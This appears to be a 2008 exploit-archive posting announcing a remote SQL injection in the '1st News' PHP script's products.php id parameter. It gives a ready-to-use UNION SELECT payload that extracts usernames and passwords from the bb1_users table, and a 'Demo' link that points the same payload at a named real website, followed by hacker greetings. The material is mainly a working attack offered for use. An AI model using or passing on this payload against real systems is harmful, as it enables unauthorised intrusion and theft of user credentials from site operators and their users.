[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 1st News (products.php id) Remote SQL Injection Vulnerability
# Published : 2008-11-02
# Author : TR-ShaRk
# Previous Title : Maran PHP Shop (prodshow.php) SQL Injection Vulnerability
# Next Title : deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit


##################################################################
#
#   Author: TR-ShaRk
#
######################
#
#   Web   : StarHack.Us OldKral.Com
#
######################
#
#   Emai   : Admin@tr-shark.org
#
######################
#
#   Script price : 19,00a??
#
#   Here:http://1st-scripts.de/products.php?id=18&associate=
#
#
######################
#
#   SQL Injection Vuln. :
#   products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
#
#
######################
#
#   Demo:
#
#   http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
#
######################
SEHITLER ?–LMEZ VATAN B?–L??NMEZ
Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL

# www.Syue.com [2008-11-02]